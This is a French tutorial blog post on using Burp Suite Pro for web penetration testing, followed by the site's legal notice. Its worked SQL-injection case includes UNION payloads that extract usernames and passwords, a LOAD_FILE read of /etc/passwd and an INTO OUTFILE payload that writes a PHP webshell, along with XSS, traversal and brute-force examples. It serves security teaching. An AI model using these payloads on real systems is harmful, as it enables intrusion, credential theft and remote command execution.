Cybersécurité22 min

Burp Suite Pro : Guide Complet du Pentesting Web Avancé (2025)

Maîtrisez Burp Suite Pro, l'outil professionnel de référence pour le pentesting d'applications web. Guide complet : Proxy, Scanner, Intruder, Repeater, extensions et cas pratiques d'exploitation de vulnérabilités.

Introduction : Burp Suite, le couteau suisse du pentesting web

Burp Suite est l'outil de test d'intrusion web le plus utilisé par les professionnels de la cybersécurité. Développé par PortSwigger, ce proxy intercepteur permet d'analyser, manipuler et exploiter les vulnérabilités des applications web modernes.

Que vous soyez pentester, bug bounty hunter ou développeur soucieux de la sécurité de vos applications, Burp Suite est un incontournable. Dans ce guide exhaustif, vous apprendrez à maîtriser Burp Suite Pro pour réaliser des audits de sécurité complets et découvrir des vulnérabilités avant les attaquants.


Qu'est-ce que Burp Suite ?

Burp Suite est une plateforme intégrée de test de sécurité d'applications web. Elle agit comme un proxy HTTP/HTTPS entre votre navigateur et les serveurs web, permettant d'intercepter, analyser et modifier les requêtes et réponses.

Les versions de Burp Suite

  • Burp Suite Community Edition : Gratuite, fonctionnalités limitées, idéale pour débuter
  • Burp Suite Professional : 449$/an, scanner automatique, outils avancés, support technique
  • Burp Suite Enterprise : Pour les grandes organisations, intégration CI/CD, gestion centralisée

Ce guide se concentre sur Burp Suite Professional, la version utilisée par la majorité des pentesters.


Pourquoi Burp Suite est-il indispensable ?

  • Intercepter et modifier les requêtes : Testez des payloads malveillants, contournez les contrôles côté client
  • Scanner automatique de vulnérabilités : Détection d'injections SQL, XSS, SSRF, XXE, etc.
  • Fuzzing avancé : Tests exhaustifs avec l'Intruder (force brute, fuzzing de paramètres)
  • Répéter et analyser : Rejouer des requêtes pour comprendre le comportement de l'application
  • Extensions puissantes : Logger++, Autorize, Turbo Intruder, JSON Web Tokens...
  • Support HTTPS/TLS : Décryptage et analyse du trafic chiffré

Installation et Configuration

Téléchargement

Rendez-vous sur portswigger.net/burp/releases et téléchargez la version correspondant à votre OS (Windows, macOS, Linux).

Installation

# Linux
chmod +x burpsuit_community_linux.sh
./burpsuit_community_linux.sh

# macOS
Ouvrir le .dmg et glisser Burp Suite dans Applications

# Windows
Exécuter l'installateur .exe

Configuration du proxy

Par défaut, Burp écoute sur 127.0.0.1:8080. Vous devez configurer votre navigateur pour utiliser ce proxy.

Option 1 : Extension FoxyProxy (recommandé)

  • Installez FoxyProxy dans Firefox ou Chrome
  • Créez un profil : 127.0.0.1:8080
  • Activez-le uniquement pendant vos tests

Option 2 : Configuration manuelle du navigateur

Firefox : Paramètres > Réseau > Configurer la connexion...

  • Configuration manuelle du proxy
  • HTTP Proxy : 127.0.0.1, Port : 8080
  • Cochez "Utiliser ce serveur proxy pour tous les protocoles"

Installer le certificat CA de Burp

Pour intercepter le trafic HTTPS, vous devez installer le certificat de Burp.

  1. Démarrez Burp Suite
  2. Configurez votre proxy comme ci-dessus
  3. Dans le navigateur, allez sur : http://burpsuite
  4. Cliquez sur "CA Certificate" en haut à droite
  5. Enregistrez le fichier cacert.der
  6. Importez-le dans les certificats de votre navigateur/système

Firefox : Paramètres > Vie privée et sécurité > Certificats > Voir les certificats > Importer


Interface de Burp Suite : Tour d'horizon

Dashboard

Vue d'ensemble de votre session : tâches actives, scanner en cours, alertes de vulnérabilités.

Target

Arborescence de tous les sites que vous avez explorés. Permet de définir la portée (scope) de vos tests.

Proxy

Le cœur de Burp : intercepter et manipuler les requêtes HTTP/HTTPS en temps réel.

Intruder

Outil de fuzzing et d'attaque automatisée (force brute, fuzzing de paramètres).

Repeater

Rejouer une requête manuellement en modifiant les paramètres pour tester différents payloads.

Sequencer

Analyser la qualité des tokens de session (entropie, prédictibilité).

Decoder

Encoder/décoder des données (Base64, URL, HTML, hex, etc.).

Comparer

Comparer deux requêtes/réponses pour identifier les différences.

Scanner (Pro uniquement)

Scanner automatique de vulnérabilités : injection SQL, XSS, SSRF, XXE, etc.

Extensions (Extender)

Store d'extensions (BApp Store) pour ajouter des fonctionnalités supplémentaires.


1. Proxy : Intercepter et manipuler les requêtes

Activer l'interception

Onglet Proxy > Intercept, cliquez sur "Intercept is on".

Naviguez sur un site, Burp interceptera automatiquement la requête avant qu'elle n'atteigne le serveur.

Analyser une requête HTTP

GET /api/user/123 HTTP/1.1
Host: example.com
Cookie: session=abc123def456
User-Agent: Mozilla/5.0
Accept: application/json

Vous pouvez :

  • Forward : Envoyer la requête telle quelle
  • Drop : Supprimer la requête
  • Modifier : Changer les paramètres, headers, body
  • Action > Send to Repeater : Envoyer vers le Repeater pour tests manuels
  • Action > Send to Intruder : Envoyer vers l'Intruder pour fuzzing

Cas pratique : Contourner une restriction côté client

Imaginons un formulaire qui limite le prix max à 100€ via JavaScript côté client.

  1. Interceptez la requête POST avec Burp
  2. Modifiez le paramètre price=100 en price=1
  3. Forward la requête
  4. Si le serveur ne valide pas, vous payez 1€ au lieu de 100€ (vulnérabilité !)

HTTP History

Onglet Proxy > HTTP history : historique complet de toutes les requêtes/réponses.

Filtres utiles :

  • Afficher uniquement les requêtes dans le scope
  • Filtrer par méthode (GET, POST, PUT, DELETE)
  • Filtrer par code de statut (200, 302, 403, 500)
  • Rechercher des patterns (mot de passe, token, API key)

2. Scanner : Détection automatique de vulnérabilités (Pro)

Lancer un scan actif

  1. Clic droit sur une requête dans HTTP History
  2. Scan > Active scan
  3. Configurez la portée (URL spécifique ou site entier)
  4. Lancez le scan

Le scanner va automatiquement tester :

  • Injections SQL : ' OR 1=1--, UNION SELECT
  • XSS (Cross-Site Scripting) : <script>alert(1)</script>
  • Path Traversal : ../../etc/passwd
  • SSRF (Server-Side Request Forgery)
  • XXE (XML External Entity)
  • Command Injection : ; ls -la
  • Open Redirect
  • Headers de sécurité manquants (CSP, HSTS, X-Frame-Options)

Scanner passif

Le scanner passif analyse les requêtes/réponses sans envoyer de payloads malveillants. Il détecte :

  • Informations sensibles dans les réponses (emails, clés API, tokens)
  • Headers HTTP non sécurisés
  • Cookies sans flag Secure ou HttpOnly
  • Versions de logiciels obsolètes dans les bannières

Interpréter les résultats

Onglet Dashboard > Issue activity ou Target > Site map (icônes colorées).

Niveaux de sévérité :

  • High (rouge) : Vulnérabilité critique (injection SQL, RCE)
  • Medium (orange) : Risque modéré (XSS, CSRF)
  • Low (jaune) : Risque faible (informations divulguées, headers manquants)
  • Information (bleu) : Pas de risque direct mais informations utiles

3. Repeater : Rejouer et analyser des requêtes

Utilisation du Repeater

  1. Clic droit sur une requête > Send to Repeater
  2. Onglet Repeater
  3. Modifiez la requête (paramètres, headers, body)
  4. Cliquez sur Send
  5. Analysez la réponse dans le panneau de droite

Cas pratique : Tester une injection SQL

URL : GET /product?id=5

Testez des payloads SQL :

/product?id=5'
/product?id=5' OR 1=1--
/product?id=5' UNION SELECT NULL,NULL,NULL--
/product?id=5' AND SLEEP(5)--

Si le serveur répond différemment (erreur SQL, contenu différent, délai), c'est potentiellement vulnérable.

Comparer plusieurs requêtes

Créez plusieurs onglets Repeater pour tester différents payloads et comparez les réponses.


4. Intruder : Fuzzing et attaques automatisées

Principe de l'Intruder

L'Intruder permet d'automatiser l'envoi de requêtes avec des payloads variables pour tester différentes hypothèses : force brute, fuzzing de paramètres, énumération...

Étapes d'utilisation

  1. Envoyez une requête vers l'Intruder : Send to Intruder
  2. Onglet Intruder > Positions : Définissez les points d'injection avec §§
  3. Onglet Payloads : Choisissez vos payloads (liste, nombres, fuzzing)
  4. Onglet Options : Configurez les threads, redirections, encodage
  5. Cliquez sur Start attack

Types d'attaques

  • Sniper : Un seul point d'injection, teste chaque payload
  • Battering ram : Plusieurs points d'injection, même payload pour tous
  • Pitchfork : Plusieurs points, chaque position a sa propre liste (payloads synchronisés)
  • Cluster bomb : Toutes les combinaisons possibles entre les positions

Cas pratique : Force brute d'authentification

Requête POST de login :

POST /login HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

username=admin&password=test123

Configuration Intruder :

  1. Type d'attaque : Cluster bomb
  2. Positions : username=§admin§&password=§test123§
  3. Payload set 1 (username) : liste de usernames (admin, root, user, etc.)
  4. Payload set 2 (password) : liste de mots de passe courants
  5. Start attack
  6. Analysez les réponses : code 302 (redirection) = succès, 401 = échec

Fuzzing de paramètres

URL : GET /api/user?id=5

Payload list : 1, 2, 3, -1, 0, 999, ' OR 1=1--, ../../../etc/passwd

Observez les différences de réponses (longueur, code, contenu) pour identifier des anomalies.


5. Extensions essentielles

Installer des extensions

Onglet Extender > BApp Store : parcourez les extensions disponibles et installez-les en un clic.

Extensions recommandées

1. Logger++

Logger HTTP avancé avec filtres, export CSV, recherche puissante. Meilleur que l'historique par défaut.

2. Autorize

Teste automatiquement les broken access control (IDOR, escalade de privilèges).

Principe : configurez deux sessions (user normal + admin), Autorize rejoue chaque requête avec les deux sessions pour détecter si un user peut accéder à des ressources admin.

3. Turbo Intruder

Version ultra-rapide de l'Intruder avec support Python pour scripts personnalisés. Idéal pour le fuzzing massif.

4. JSON Web Tokens (JWT)

Décode et manipule les JWT. Testez les vulnérabilités JWT : alg: none, clé faible, etc.

5. Param Miner

Découvre des paramètres cachés non documentés en testant des variations de noms courants.

6. Active Scan++

Améliore le scanner natif avec des checks supplémentaires (CORS, cache poisoning, host header injection).

7. Retire.js

Détecte les bibliothèques JavaScript obsolètes avec des vulnérabilités connues.


Cas pratique complet : Exploitation d'une injection SQL

Scénario

Application e-commerce avec recherche de produits : GET /search?q=laptop

Étape 1 : Détection

Interceptez la requête avec le Proxy, envoyez vers Repeater.

Testez des payloads SQL :

/search?q=laptop'
/search?q=laptop' OR 1=1--
/search?q=laptop' UNION SELECT NULL--

Si le serveur renvoie une erreur SQL ou un comportement anormal, il est vulnérable.

Étape 2 : Enumération

Déterminez le nombre de colonnes avec UNION :

/search?q=laptop' UNION SELECT NULL--
/search?q=laptop' UNION SELECT NULL,NULL--
/search?q=laptop' UNION SELECT NULL,NULL,NULL--

Continuez jusqu'à ne plus avoir d'erreur. Supposons 3 colonnes.

Étape 3 : Extraction de données

Récupérez la version de la base :

/search?q=laptop' UNION SELECT NULL,@@version,NULL--

Listez les tables :

/search?q=laptop' UNION SELECT NULL,table_name,NULL FROM information_schema.tables--

Récupérez les utilisateurs :

/search?q=laptop' UNION SELECT NULL,username,password FROM users--

Étape 4 : Exploitation avancée (selon le SGBD)

Lecture de fichiers (MySQL) :

/search?q=laptop' UNION SELECT NULL,LOAD_FILE('/etc/passwd'),NULL--

Écriture de fichier (webshell) :

/search?q=laptop' UNION SELECT NULL,'<?php system($_GET["cmd"]); ?>',NULL INTO OUTFILE '/var/www/html/shell.php'--

Bonnes pratiques et éthique

N'utilisez Burp Suite que légalement

Tester la sécurité d'une application sans autorisation écrite explicite est illégal dans la plupart des pays.

Cas d'usage légitimes

  • Auditer vos propres applications
  • Missions de pentest avec contrat signé et autorisation écrite
  • Bug bounty sur plateformes autorisées (HackerOne, Bugcrowd, YesWeHack)
  • Environnements de formation (HackTheBox, TryHackMe, PortSwigger Academy)

Cas illégaux

  • Tester des applications tierces sans permission
  • Exploiter des vulnérabilités découvertes sans déclaration responsable
  • Utiliser Burp pour du vol de données ou sabotage

Responsible Disclosure

Si vous trouvez une vulnérabilité :

  1. Contactez le propriétaire de manière privée
  2. Donnez un délai raisonnable pour corriger (30-90 jours)
  3. Ne divulguez publiquement qu'après correction ou expiration du délai
  4. Documentez vos découvertes (preuve de concept, impact, recommandations)

Ressources pour progresser

  • PortSwigger Web Security Academy : portswigger.net/web-security - Cours gratuits avec labs interactifs
  • Documentation officielle : portswigger.net/burp/documentation
  • HackTheBox & TryHackMe : Plateformes d'entraînement avec machines vulnérables
  • Bug Bounty Platforms : HackerOne, Bugcrowd, YesWeHack pour pratiquer légalement
  • OWASP Top 10 : Liste des vulnérabilités web les plus critiques

Burp Suite Pro vs Community : Faut-il payer ?

FonctionnalitéCommunity (Gratuit)Pro (449$/an)
Proxy HTTP/HTTPS
Repeater
Intruder (fuzzing)⚠️ Très lent (throttled)✅ Rapide
Scanner automatique
Extensions✅ (BApp Store)
Save/Load projects
Collaborateur support
Comparator

Verdict : Si vous êtes débutant ou utilisez Burp occasionnellement, Community suffit. Pour les professionnels (pentest, bug bounty), Pro est indispensable (scanner automatique + Intruder rapide).


Conclusion : Maîtriser Burp Suite, c'est maîtriser le pentesting web

Burp Suite est bien plus qu'un simple proxy : c'est une plateforme complète pour auditer la sécurité des applications web modernes. En maîtrisant ses outils (Proxy, Scanner, Repeater, Intruder) et en explorant les extensions, vous devenez capable de :

  • ✅ Identifier des vulnérabilités avant qu'elles ne soient exploitées
  • ✅ Comprendre les mécanismes d'attaque web (OWASP Top 10)
  • ✅ Automatiser des tests de sécurité complexes
  • ✅ Documenter et corriger des failles de manière professionnelle

Pratiquez sur des plateformes légales (PortSwigger Academy, HackTheBox), documentez vos découvertes et respectez toujours le cadre légal. La cybersécurité est une responsabilité, pas un jeu.

Bon pentesting responsable ! 🔐🛡️


⚠️ Avertissement et clause de non-responsabilité

Cet article est publié à des fins purement éducatives et informatives.

L'utilisation de Burp Suite ou de tout autre outil de test d'intrusion sur des applications, sites web ou infrastructures dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas reçu d'autorisation écrite explicite est strictement interdite et peut constituer une infraction pénale dans de nombreux pays.

L'auteur et CODAURA déclinent toute responsabilité quant à l'utilisation abusive, illégale ou malveillante des informations contenues dans cet article. Toute action que vous entreprenez avec les connaissances acquises ici relève de votre seule responsabilité.

Utilisez Burp Suite uniquement pour :

  • Auditer vos propres applications web
  • Réaliser des tests de sécurité dans le cadre de missions autorisées avec contrat écrit
  • Participer à des programmes de bug bounty légitimes
  • Vous former sur des environnements de test légaux (PortSwigger Academy, HackTheBox, TryHackMe)

En appliquant les techniques décrites dans cet article, vous acceptez d'agir de manière éthique, responsable et dans le strict respect des lois en vigueur.

© 2025 CODAURA - Tous droits réservés

Mentions Légales

Dernière mise à jour : 1er novembre 2025

1. Informations légales

Conformément aux dispositions de la loi n° 2004-575 du 21 juin 2004 pour la confiance en l'économie numérique, il est précisé aux utilisateurs du site codaura.io l'identité des différents intervenants dans le cadre de sa réalisation et de son suivi.

Éditeur du site

Le site codaura.io est édité par :

GAUTHIER Alexandre - CODAURA
Entrepreneur individuel
SIREN : 993 393 651
SIRET : 993 393 651 00019

Adresse du siège social :
CODAURA
13 rue de Perreux
37530 Nazelles-Négron
France

Activité : Programmation informatique (APE 62.01Z)

Contact :
Email : alex@codaura.io
Téléphone : +33770800849

Directeur de la publication

Le directeur de la publication du site est Monsieur Alexandre GAUTHIER.

Hébergement

Le site codaura.io est hébergé par :
Infomaniak Network SA Rue Eugène Marziano 25 1227 Les Acacias (GE)

2. Conditions générales d'utilisation du site

L'utilisation du site codaura.io implique l'acceptation pleine et entière des conditions générales d'utilisation décrites ci-après. Ces conditions d'utilisation sont susceptibles d'être modifiées ou complétées à tout moment, les utilisateurs du site sont donc invités à les consulter de manière régulière.

Accès au site

Le site codaura.io est accessible gratuitement en tout lieu à tout utilisateur ayant un accès à Internet. Tous les frais supportés par l'utilisateur pour accéder au service (matériel informatique, logiciels, connexion Internet, etc.) sont à sa charge.

L'éditeur met en œuvre tous les moyens raisonnables à sa disposition pour assurer un accès de qualité au site, mais n'est tenu à aucune obligation d'y parvenir. L'éditeur ne peut être tenu responsable d'une défaillance du réseau Internet ou de tout dysfonctionnement du matériel de connexion.

3. Propriété intellectuelle

L'ensemble du contenu du site codaura.io (structure, textes, logos, images, vidéos, etc.) est la propriété exclusive de CODAURA, sauf mention contraire.

Toute reproduction, distribution, modification, adaptation, retransmission ou publication de ces différents éléments est strictement interdite sans l'accord exprès par écrit de CODAURA. Cette représentation ou reproduction, par quelque procédé que ce soit, constitue une contrefaçon sanctionnée par les articles L.335-2 et suivants du Code de la propriété intellectuelle.

Le non-respect de cette interdiction constitue une contrefaçon pouvant engager la responsabilité civile et pénale du contrefacteur.

4. Protection des données personnelles

Conformément au Règlement Général sur la Protection des Données (RGPD) et à la loi Informatique et Libertés, vous disposez d'un droit d'accès, de rectification, de suppression et d'opposition aux données personnelles vous concernant.

Responsable du traitement

Le responsable du traitement des données est :
GAUTHIER Alexandre - CODAURA
13 rue de Perreux
37530 Nazelles-Négron

Données collectées

  • Données de navigation : pages consultées
  • Données de contact (nom, prénom, email) via formulaires de contact

Finalité du traitement

Les données personnelles collectées sont utilisées pour :

  • Répondre aux demandes de contact
  • Améliorer l'expérience utilisateur
  • Assurer le bon fonctionnement du site

Durée de conservation

Les données personnelles sont conservées pour la durée strictement nécessaire aux finalités poursuivies, conformément à la réglementation en vigueur.

Vos droits

Vous pouvez exercer vos droits en nous contactant à l'adresse : alex@codaura.io

5. Limitation de responsabilité

L'éditeur s'efforce d'assurer l'exactitude et la mise à jour des informations diffusées sur le site, dont il se réserve le droit de corriger, à tout moment et sans préavis, le contenu. Toutefois, l'éditeur ne peut garantir l'exactitude, la précision ou l'exhaustivité des informations mises à disposition sur ce site.

L'éditeur décline toute responsabilité :

  • Pour toute imprécision, inexactitude ou omission portant sur des informations disponibles sur le site
  • Pour tous dommages résultant d'une intrusion frauduleuse d'un tiers ayant entraîné une modification des informations mises à disposition sur le site
  • Pour tous dommages directs ou indirects qui pourraient résulter de l'accès au site ou de l'utilisation du site et de ses informations
  • Pour l'indisponibilité temporaire ou totale du site

Liens hypertextes

Le site codaura.io peut contenir des liens vers d'autres sites internet. L'éditeur ne dispose d'aucun moyen de contrôle sur le contenu de ces sites et décline toute responsabilité quant au contenu ou aux pratiques de confidentialité de ces sites tiers.

6. Droit applicable et juridiction compétente

Les présentes mentions légales sont régies par le droit français. En cas de litige et à défaut d'accord amiable, le litige sera porté devant les tribunaux français conformément aux règles de compétence en vigueur.

7. Contact

Pour toute question concernant les présentes mentions légales, vous pouvez nous contacter :

Par email : alex@codaura.io

Par courrier :
CODAURA
13 rue de Perreux
37530 Nazelles-Négron
France